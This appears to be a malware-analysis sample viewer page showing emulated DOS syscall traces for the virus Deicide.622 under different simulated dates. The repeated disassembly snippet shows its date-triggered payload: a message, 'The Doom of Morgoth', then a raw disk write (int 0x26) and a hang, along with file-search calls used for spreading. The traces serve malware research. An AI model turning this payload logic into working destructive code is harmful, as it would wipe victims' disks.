Sample viewer

vx.netlux.org/Virus.DOS.Deicide.622

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:58:57.668150447Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-17T22:58:57.671266332Z	26	PC: 12a90 \| Set disk transfer address
2018-12-17T22:58:57.672361994Z	78	PC: 12a9a \| Find first file
2018-12-17T22:58:57.67841202Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.68087713Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.684436607Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.687125252Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.689800881Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.698049223Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.705855128Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.708933292Z	79	PC: 12add \| Find next file
2018-12-17T22:58:57.711766422Z	26	PC: 12b76 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13057,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:16.733802336Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-25T12:37:16.736847226Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:37:16.738186117Z	78	PC: 12a9a \| Find first file
2018-12-25T12:37:16.743999874Z	79	PC: 12add \| Find next file
2018-12-25T12:37:16.747602906Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.750367881Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.753538987Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.756457972Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.7592097Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.761558904Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.763986335Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.766282765Z	26	PC: 12b76 \| Set disk transfer address

{"DateBased":true,"Day":3,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13057,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:16.915974558Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-25T12:37:16.918987661Z	9	PC: 12a6d \| Display string (String= ' This Personal Computer has been struck by the uncurable disease that is called "The Doom of Morgoth". ')

{"DateBased":true,"Day":19,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13057,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:16.946645006Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-25T12:37:16.949450401Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:37:16.951625085Z	78	PC: 12a9a \| Find first file
2018-12-25T12:37:16.959283924Z	79	PC: 12add \| Find next file
2018-12-25T12:37:16.962146117Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.966027482Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.968681899Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.971185967Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.979563237Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.982241591Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:16.984832253Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.000183402Z	26	PC: 12b76 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13057,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:17.562229872Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-25T12:37:17.569306Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:37:17.57071394Z	78	PC: 12a9a \| Find first file
2018-12-25T12:37:17.577537726Z	79	PC: 12add \| Find next file
2018-12-25T12:37:17.580819637Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.58426112Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.587287257Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.590186923Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.593427093Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.59661256Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.599794252Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.603738253Z	26	PC: 12b76 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13057,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:17.808453524Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23b 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b2] 0x12a7e: mov word ptr [0x2ae], ax 0x12a81: mov bx, word ptr [0x2b4]
2018-12-25T12:37:17.811026184Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:37:17.811947543Z	78	PC: 12a9a \| Find first file
2018-12-25T12:37:17.817773964Z	79	PC: 12add \| Find next file
2018-12-25T12:37:17.821098822Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.823599674Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.82615017Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.828706326Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.831997825Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.834406043Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.836786938Z	79	PC: 12add \| Find next file (See above)
2018-12-25T12:37:17.839737316Z	26	PC: 12b76 \| Set disk transfer address